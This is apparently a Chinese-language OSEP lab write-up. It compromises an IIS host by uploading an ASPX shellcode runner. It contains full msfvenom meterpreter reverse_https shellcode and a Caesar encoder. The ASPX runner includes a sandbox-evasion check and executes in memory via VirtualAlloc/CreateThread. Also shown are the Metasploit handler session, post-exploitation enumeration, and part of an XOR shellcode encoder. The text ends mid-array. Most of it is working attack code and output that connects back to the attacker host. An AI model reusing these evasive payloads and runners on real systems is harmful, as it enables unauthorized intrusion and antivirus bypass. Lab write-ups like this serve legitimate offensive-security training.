nmap扫描:nmap -sT -A -p- 192.168.243.181
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ **nmap -sT -A -p- 192.168.243.181**
Starting Nmap 7.92 ( <https://nmap.org> ) at 2022-08-02 21:16 EDT
Nmap scan report for 192.168.243.181
Host is up (0.21s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
**80/tcp open http Microsoft IIS httpd 10.0**
|_http-title: Home Page - Final Application
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: WEB05
| DNS_Domain_Name: final.com
| DNS_Computer_Name: web05.final.com
| DNS_Tree_Name: final.com
| Product_Version: 10.0.17763
|_ System_Time: 2022-08-03T01:25:10+00:00
| ssl-cert: Subject: commonName=web05.final.com
| Not valid before: 2022-06-20T16:52:32
|_Not valid after: 2022-12-20T16:52:32
|_ssl-date: 2022-08-03T01:25:14+00:00; 0s from scanner time.
9090/tcp open zeus-admin?
| fingerprint-strings:
| FourOhFourRequest, NULL, TerminalServerCookie, WMSRequest:
|_ This is Zen HelpDesk, please perform the required authentication
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port9090-TCP:V=7.92%I=7%D=8/2%Time=62E9CE63%P=x86_64-pc-linux-gnu%r(NUL
SF:L,40,"This\\x20is\\x20Zen\\x20HelpDesk,\\x20please\\x20perform\\x20the\\x20req
SF:uired\\x20authentication")%r(WMSRequest,40,"This\\x20is\\x20Zen\\x20HelpDes
SF:k,\\x20please\\x20perform\\x20the\\x20required\\x20authentication")%r(Termin
SF:alServerCookie,40,"This\\x20is\\x20Zen\\x20HelpDesk,\\x20please\\x20perform\\
SF:x20the\\x20required\\x20authentication")%r(FourOhFourRequest,40,"This\\x20
SF:is\\x20Zen\\x20HelpDesk,\\x20please\\x20perform\\x20the\\x20required\\x20authe
SF:ntication");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 530.43 seconds
访问80端口:
发现上传点。查看源代码,像是一个可以上传aspx文件,结合nmap扫描出IIS服务器,基本确定可以上传aspx文件。
对使用的payload进行caesar变换:
原始的rev.aspx生成方式如下:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.243 LPORT=443 -f aspx -o rev.aspx
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Caesar
{
class Program
{
static void Main(string[] args)
{
//msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.243 LPORT=443 -f aspx -o rev.aspx
**byte[] buf = new byte[626]** {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x51,0x56,0x65,0x48,0x8b,0x52,0x60,
0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,
0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,
0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4d,0x31,0xc9,0x48,0xff,0xc9,0x41,0x8b,0x34,
0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,
0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,
0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,
0x6e,0x65,0x74,0x00,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,0x07,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,
0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x00,0x00,0x00,0x00,0xff,0xd5,0xe8,0x0f,0x00,0x00,0x00,
0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x34,0x39,0x2e,0x32,0x34,0x33,0x00,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xbb,0x01,0x00,
0x00,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x03,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x00,0x00,0x00,0x00,0xff,0xd5,0xe8,0x48,0x00,0x00,
0x00,0x2f,0x43,0x32,0x5f,0x6f,0x30,0x4b,0x57,0x47,0x50,0x52,0x54,0x56,0x49,0x39,0x51,0x68,0x74,0x38,0x6f,0x49,0x42,0x67,0x2d,
0x65,0x75,0x69,0x79,0x4b,0x68,0x42,0x78,0x39,0x50,0x7a,0x50,0x6a,0x75,0x61,0x37,0x41,0x67,0x63,0x70,0x6b,0x73,0x4e,0x36,0x67,
0x38,0x30,0x56,0x31,0x59,0x4c,0x79,0x38,0x64,0x30,0x64,0x65,0x66,0x53,0x75,0x59,0x33,0x54,0x71,0x34,0x62,0x51,0x00,0x48,0x89,
0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x00,0x32,0xa8,0x84,0x00,0x00,0x00,0x00,0x50,0x53,0x53,0x49,0xc7,0xc2,
0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x6a,0x1f,0x5a,0x52,0x68,0x80,0x33,0x00,0x00,0x49,
0x89,0xe0,0x6a,0x04,0x41,0x59,0x49,0xba,0x75,0x46,0x9e,0x86,0x00,0x00,0x00,0x00,0xff,0xd5,0x4d,0x31,0xc0,0x53,0x5a,0x48,0x89,
0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,
0x88,0x13,0x00,0x00,0x49,0xba,0x44,0xf0,0x35,0xe0,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0xff,0xcf,0x74,0x02,0xeb,0xaa,0xe8,0x55,
0x00,0x00,0x00,0x53,0x59,0x6a,0x40,0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x00,0x10,0x00,0x00,0x49,0xba,0x58,0xa4,
0x53,0xe5,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x00,
0x20,0x00,0x00,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,
0xb2,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,
0xd5 };
byte[] encoded = new byte[buf.Length];
for (int i = 0; i < buf.Length; i++)
{
**encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF);**
}
//uint counter = 0;
StringBuilder hex = new StringBuilder(encoded.Length * 2);
foreach (byte b in encoded)
{
hex.AppendFormat("0x{0:x2}, ", b);
}
//foreach (byte b in encoded)
//{
// hex.AppendFormat("{0:D}, ", b);
// counter++;
// if (counter % 50 == 0)
// {
// hex.AppendFormat("_{0}", Environment.NewLine);
// }
//}
Console.WriteLine("The payload is: " + hex.ToString());
}
}
}
修改后的rev_caesar.aspx代码如下:
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
[System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true,ExactSpelling = true)]
private static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress,uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
[System.Runtime.InteropServices.DllImport("kernel32.dll")]
private static extern IntPtr GetCurrentProcess();
protected void Page_Load(object sender, EventArgs e)
{
**IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4,0);**
if(mem == null)
{
return;
}
byte[] rfiWvNRni = **new byte[626]** {
0xfe, 0x4a, 0x85, 0xe6, 0xf2, 0xea, 0xce, 0x02, 0x02, 0x02, 0x43, 0x53, 0x43, 0x52, 0x54, 0x4a, 0x33, 0xd4, 0x53, 0x58, 0x67, 0x4a, 0x8d, 0x54, 0x62, 0x4a, 0x8d, 0x54, 0x1a, 0x4a, 0x8d, 0x54, 0x22, 0x4a, 0x8d, 0x74, 0x52, 0x4a, 0x11, 0xb9, 0x4c, 0x4c, 0x4f, 0x33, 0xcb, 0x4a, 0x33, 0xc2, 0xae, 0x3e, 0x63, 0x7e, 0x04, 0x2e, 0x22, 0x43, 0xc3, 0xcb, 0x0f, 0x43, 0x03, 0xc3, 0xe4, 0xef, 0x54, 0x43, 0x53, 0x4a, 0x8d, 0x54, 0x22, 0x8d, 0x44, 0x3e, 0x4a, 0x03, 0xd2, 0x68, 0x83, 0x7a, 0x1a, 0x0d, 0x04, 0x11, 0x87, 0x74, 0x02, 0x02, 0x02, 0x8d, 0x82, 0x8a, 0x02, 0x02, 0x02, 0x4a, 0x87, 0xc2, 0x76, 0x69, 0x4a, 0x03, 0xd2, 0x52, 0x8d, 0x4a, 0x1a, 0x46, 0x8d, 0x42, 0x22, 0x4b, 0x03, 0xd2, 0xe5, 0x58, 0x4f, 0x33, 0xcb, 0x4a, 0x01, 0xcb, 0x43, 0x8d, 0x36, 0x8a, 0x4a, 0x03, 0xd8, 0x4a, 0x33, 0xc2, 0xae, 0x43, 0xc3, 0xcb, 0x0f, 0x43, 0x03, 0xc3, 0x3a, 0xe2, 0x77, 0xf3, 0x4e, 0x05, 0x4e, 0x26, 0x0a, 0x47, 0x3b, 0xd3, 0x77, 0xda, 0x5a, 0x46, 0x8d, 0x42, 0x26, 0x4b, 0x03, 0xd2, 0x68, 0x43, 0x8d, 0x0e, 0x4a, 0x46, 0x8d, 0x42, 0x1e, 0x4b, 0x03, 0xd2, 0x43, 0x8d, 0x06, 0x8a, 0x4a, 0x03, 0xd2, 0x43, 0x5a, 0x43, 0x5a, 0x60, 0x5b, 0x5c, 0x43, 0x5a, 0x43, 0x5b, 0x43, 0x5c, 0x4a, 0x85, 0xee, 0x22, 0x43, 0x54, 0x01, 0xe2, 0x5a, 0x43, 0x5b, 0x5c, 0x4a, 0x8d, 0x14, 0xeb, 0x4d, 0x01, 0x01, 0x01, 0x5f, 0x4a, 0x33, 0xdd, 0x55, 0x4b, 0xc0, 0x79, 0x6b, 0x70, 0x6b, 0x70, 0x67, 0x76, 0x02, 0x43, 0x58, 0x4a, 0x8b, 0xe3, 0x4b, 0xc9, 0xc4, 0x4e, 0x79, 0x28, 0x09, 0x01, 0xd7, 0x55, 0x55, 0x4a, 0x8b, 0xe3, 0x55, 0x5c, 0x4f, 0x33, 0xc2, 0x4f, 0x33, 0xcb, 0x55, 0x55, 0x4b, 0xbc, 0x3c, 0x58, 0x7b, 0xa9, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0xea, 0x11, 0x02, 0x02, 0x02, 0x33, 0x3b, 0x34, 0x30, 0x33, 0x38, 0x3a, 0x30, 0x36, 0x3b, 0x30, 0x34, 0x36, 0x35, 0x02, 0x5c, 0x4a, 0x8b, 0xc3, 0x4b, 0xc9, 0xc2, 0xbd, 0x03, 0x02, 0x02, 0x4f, 0x33, 0xcb, 0x55, 0x55, 0x6c, 0x05, 0x55, 0x4b, 0xbc, 0x59, 0x8b, 0xa1, 0xc8, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0xea, 0x4a, 0x02, 0x02, 0x02, 0x31, 0x45, 0x34, 0x61, 0x71, 0x32, 0x4d, 0x59, 0x49, 0x52, 0x54, 0x56, 0x58, 0x4b, 0x3b, 0x53, 0x6a, 0x76, 0x3a, 0x71, 0x4b, 0x44, 0x69, 0x2f, 0x67, 0x77, 0x6b, 0x7b, 0x4d, 0x6a, 0x44, 0x7a, 0x3b, 0x52, 0x7c, 0x52, 0x6c, 0x77, 0x63, 0x39, 0x43, 0x69, 0x65, 0x72, 0x6d, 0x75, 0x50, 0x38, 0x69, 0x3a, 0x32, 0x58, 0x33, 0x5b, 0x4e, 0x7b, 0x3a, 0x66, 0x32, 0x66, 0x67, 0x68, 0x55, 0x77, 0x5b, 0x35, 0x56, 0x73, 0x36, 0x64, 0x53, 0x02, 0x4a, 0x8b, 0xc3, 0x55, 0x5c, 0x43, 0x5a, 0x4f, 0x33, 0xcb, 0x55, 0x4a, 0xba, 0x02, 0x34, 0xaa, 0x86, 0x02, 0x02, 0x02, 0x02, 0x52, 0x55, 0x55, 0x4b, 0xc9, 0xc4, 0xed, 0x57, 0x30, 0x3d, 0x01, 0xd7, 0x4a, 0x8b, 0xc8, 0x6c, 0x0c, 0x61, 0x4a, 0x8b, 0xf3, 0x6c, 0x21, 0x5c, 0x54, 0x6a, 0x82, 0x35, 0x02, 0x02, 0x4b, 0x8b, 0xe2, 0x6c, 0x06, 0x43, 0x5b, 0x4b, 0xbc, 0x77, 0x48, 0xa0, 0x88, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0x4f, 0x33, 0xc2, 0x55, 0x5c, 0x4a, 0x8b, 0xf3, 0x4f, 0x33, 0xcb, 0x4f, 0x33, 0xcb, 0x55, 0x55, 0x4b, 0xc9, 0xc4, 0x2f, 0x08, 0x1a, 0x7d, 0x01, 0xd7, 0x87, 0xc2, 0x77, 0x21, 0x4a, 0xc9, 0xc3, 0x8a, 0x15, 0x02, 0x02, 0x4b, 0xbc, 0x46, 0xf2, 0x37, 0xe2, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0x4a, 0x01, 0xd1, 0x76, 0x04, 0xed, 0xac, 0xea, 0x57, 0x02, 0x02, 0x02, 0x55, 0x5b, 0x6c, 0x42, 0x5c, 0x4b, 0x8b, 0xd3, 0xc3, 0xe4, 0x12, 0x4b, 0xc9, 0xc2, 0x02, 0x12, 0x02, 0x02, 0x4b, 0xbc, 0x5a, 0xa6, 0x55, 0xe7, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0x4a, 0x95, 0x55, 0x55, 0x4a, 0x8b, 0xe9, 0x4a, 0x8b, 0xf3, 0x4a, 0x8b, 0xdc, 0x4b, 0xc9, 0xc2, 0x02, 0x22, 0x02, 0x02, 0x4b, 0x8b, 0xfb, 0x4b, 0xbc, 0x14, 0x98, 0x8b, 0xe4, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0x4a, 0x85, 0xc6, 0x22, 0x87, 0xc2, 0x76, 0xb4, 0x68, 0x8d, 0x09, 0x4a, 0x03, 0xc5, 0x87, 0xc2, 0x77, 0xd4, 0x5a, 0xc5, 0x5a, 0x6c, 0x02, 0x5b, 0x4b, 0xc9, 0xc4, 0xf2, 0xb7, 0xa4, 0x58, 0x01, 0xd7 };
for(int i = 0; i < rfiWvNRni.Length; i++)
{
**rfiWvNRni[i] = (byte)(((uint)rfiWvNRni[i] - 2) & 0xFF);**
}
IntPtr xQFw9 = VirtualAlloc(IntPtr.Zero,(UIntPtr)rfiWvNRni.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(rfiWvNRni,0,xQFw9,rfiWvNRni.Length);
IntPtr mdhvexZa4rn = IntPtr.Zero;
IntPtr td8DLG = CreateThread(IntPtr.Zero,UIntPtr.Zero,xQFw9,IntPtr.Zero,0,ref mdhvexZa4rn);
}
</script>
开始上传成功,执行出错,发现是因为设置的byte数组给的大小不匹配导致的。注意caesar变换的偏移需要一致。
反弹shell回来,IIS默认aspx文件的保存路径为c:\\inetpub\\wwwroot
msf6 exploit(multi/handler) > exploit
[*] Started HTTPS reverse handler on <https://192.168.49.243:443>
[*] <https://192.168.49.243:443> handling request from 192.168.243.181; (UUID: ykt7f5t4) Staging x64 payload (201820 bytes) ...
[*] Meterpreter session 2 opened (192.168.49.243:443 -> 127.0.0.1) at 2022-08-02 22:57:13 -0400
meterpreter > shell
Process 960 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\\windows\\system32\\inetsrv>cd **c:\\inetpub\\wwwroot**
cd c:\\inetpub\\wwwroot
c:\\inetpub\\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is 26C9-5315
Directory of c:\\inetpub\\wwwroot
08/02/2022 07:38 PM <DIR> .
08/02/2022 07:38 PM <DIR> ..
10/27/2020 11:30 AM <DIR> aspnet_client
10/28/2020 02:07 AM <DIR> Final
10/27/2020 08:54 AM 703 iisstart.htm
10/27/2020 08:54 AM 99,710 iisstart.png
08/02/2022 07:38 PM 4,456 rev.aspx
08/02/2022 07:56 PM 5,552 **rev_caesar.aspx**
08/02/2022 07:33 PM 5 test.txt
10/28/2020 02:09 AM 274 web.config
6 File(s) 110,700 bytes
4 Dir(s) 3,125,207,040 bytes free
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST 192.168.49.243
LHOST => 192.168.49.243
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > exploit
[*] Started HTTPS reverse handler on <https://192.168.49.243:443>
[*] <https://192.168.49.243:443> handling request from 192.168.243.181; (UUID: fwcbnzgp) Staging x64 payload (201820 bytes) ...
[*] Meterpreter session 1 opened (192.168.49.243:443 -> 127.0.0.1) at 2022-08-04 03:00:58 -0400
meterpreter > execute -f notepad.exe
Process 2268 created.
meterpreter > migrate -P 2268
[*] Migrating from 1988 to 2268...
[*] Migration completed successfully.
meterpreter > shell
Process 3204 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\\windows\\system32\\inetsrv>
meterpreter > shell
Process 636 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\\windows\\system32\\inetsrv>where /R c:\\ local.txt
where /R c:\\ local.txt
c:\\inetpub\\local.txt
c:\\windows\\system32\\inetsrv>
c:\\windows\\system32\\inetsrv>type c:\\inetpub\\local.txt
type c:\\inetpub\\local.txt
09b72e94ac6c57f4171aab83f205e320
c:\\windows\\system32\\inetsrv>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.243.181
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.243.254
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.243.181
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
c:\\windows\\system32\\inetsrv>hostname
hostname
web05
c:\\windows\\system32\\inetsrv>whoami
whoami
**iis apppool\\defaultapppool**
c:\\windows\\system32\\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
**SeImpersonatePrivilege Impersonate a client after authentication Enabled**
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
生成一个csharp的shellcode,用于后续提权后反弹:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.243 LPORT=443 -f csharp
byte[] buf = new byte[642] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x48,0x31,0xd2,0x56,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,0x48,0x0f,0xb7,0x4a,0x4a,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x8b,0x48,
0x18,0x44,0x8b,0x40,0x20,0x50,0x49,0x01,0xd0,0xe3,0x56,0x4d,0x31,0xc9,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0xac,0x41,0xc1,
0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x41,0x58,
0x48,0x01,0xd0,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,
0x6e,0x65,0x74,0x00,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,
0x07,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,
0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x00,0x00,0x00,0x00,0xff,0xd5,
0xe8,0x0f,0x00,0x00,0x00,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x34,0x39,
0x2e,0x32,0x34,0x33,0x00,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xbb,0x01,0x00,
0x00,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x03,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,
0x00,0x00,0x00,0x00,0xff,0xd5,0xe8,0x58,0x00,0x00,0x00,0x2f,0x35,0x32,0x52,
0x6b,0x4f,0x41,0x6e,0x35,0x71,0x67,0x35,0x6c,0x39,0x57,0x54,0x33,0x42,0x78,
0x39,0x49,0x78,0x51,0x56,0x30,0x4a,0x50,0x69,0x68,0x62,0x5f,0x57,0x38,0x70,
0x73,0x46,0x63,0x62,0x73,0x34,0x35,0x45,0x39,0x59,0x37,0x69,0x4d,0x4a,0x62,
0x35,0x6f,0x65,0x6f,0x52,0x59,0x4c,0x49,0x64,0x56,0x62,0x7a,0x51,0x6e,0x6e,
0x77,0x71,0x6b,0x7a,0x61,0x56,0x4b,0x64,0x55,0x4b,0x71,0x70,0x4b,0x74,0x34,
0x6c,0x7a,0x53,0x4c,0x4f,0x59,0x57,0x4f,0x00,0x48,0x89,0xc1,0x53,0x5a,0x41,
0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x00,0x32,0xa8,0x84,0x00,0x00,0x00,0x00,
0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,
0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x6a,0x1f,0x5a,0x52,0x68,0x80,0x33,0x00,0x00,
0x49,0x89,0xe0,0x6a,0x04,0x41,0x59,0x49,0xba,0x75,0x46,0x9e,0x86,0x00,0x00,
0x00,0x00,0xff,0xd5,0x4d,0x31,0xc0,0x53,0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,
0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,
0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,0x00,0x00,0x49,0xba,0x44,0xf0,0x35,
0xe0,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0xff,0xcf,0x74,0x02,0xeb,0xaa,0xe8,
0x55,0x00,0x00,0x00,0x53,0x59,0x6a,0x40,0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,
0x49,0xc7,0xc0,0x00,0x10,0x00,0x00,0x49,0xba,0x58,0xa4,0x53,0xe5,0x00,0x00,
0x00,0x00,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,
0x89,0xda,0x49,0xc7,0xc0,0x00,0x20,0x00,0x00,0x49,0x89,0xf9,0x49,0xba,0x12,
0x96,0x89,0xe2,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,
0x74,0xb2,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,
0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5 };
采用xor对shellcode进行编码,key使用一个字符串,而不是单独的字符:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace XorCoder
{
public class Program
{
private static byte[] xor(byte[] cipher, byte[] key)
{
byte[] xored = new byte[cipher.Length];
for (int i = 0; i < cipher.Length; i++)
{
xored[i] = (byte)(cipher[i] ^ key[i % key.Length]);
}
return xored;
}
public static void Main(string[] args)
{
string key = "deklitxwsskqgaycerhblxigvoabxwzpxxpiibudwabixtddmt";
// msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.243 LPORT=443 -f csharp
byte[] buf = new byte[642] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x48,0x31,0xd2,0x56,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,0x48,0x0f,0xb7,0x4a,0x4a,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x8b,0x48,
0x18,0x44,0x8b,0x40,0x20,0x50,0x49,0x01,0xd0,0xe3,0x56,0x4d,0x31,0xc9,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0xac,0x41,0xc1,
0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x41,0x58,
